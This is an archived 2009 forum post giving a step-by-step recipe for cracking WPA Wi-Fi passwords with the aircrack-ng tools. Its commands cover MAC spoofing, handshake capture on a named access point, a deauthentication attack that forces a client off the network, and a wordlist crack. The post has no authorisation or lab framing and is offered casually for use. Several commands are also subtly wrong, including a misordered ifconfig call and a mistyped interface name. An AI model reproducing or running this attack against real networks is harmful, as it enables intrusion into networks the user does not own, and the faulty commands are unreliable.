PDA

View Full Version : Cracking WPA Encryption


GhostExodus
June 2nd, 2009, 02:22 AM
Most of yall im sure are using windoz heh... But just a friendly note, if you are a linux user aircrack-ng is obtainable easier than opening the mail with a sausage.

Most of you are probably going to be using back track 3. Very similar to cracking WEP

for my wireless card, i will be using eth1. The MAC Spoofing step is optional.
---------------------------------------------------------------------------------
airmon-ng stop eth1
-------------------------------------------------------------------------------
MAC SPOOF
ifconfig down eth1
macchanger --mac 11:22:33:44:55:66 et1
-----------------------------------------------------------------------------------
airmon-ng start eth1


airodump-ng --write hackedwep.cap --channel 11 --bssid 00:13:A3:D6:56:CE --encrypt wpa eth1

aireplay-ng -0 1 -a 00:13:A3:D6:56:CE -c 00:21:5C:7E:A4:B5 eth1

aircrack-ng -c hackedwep.cap-02.cap -w list.txt

A many thanks to crash for showing me the works. good job!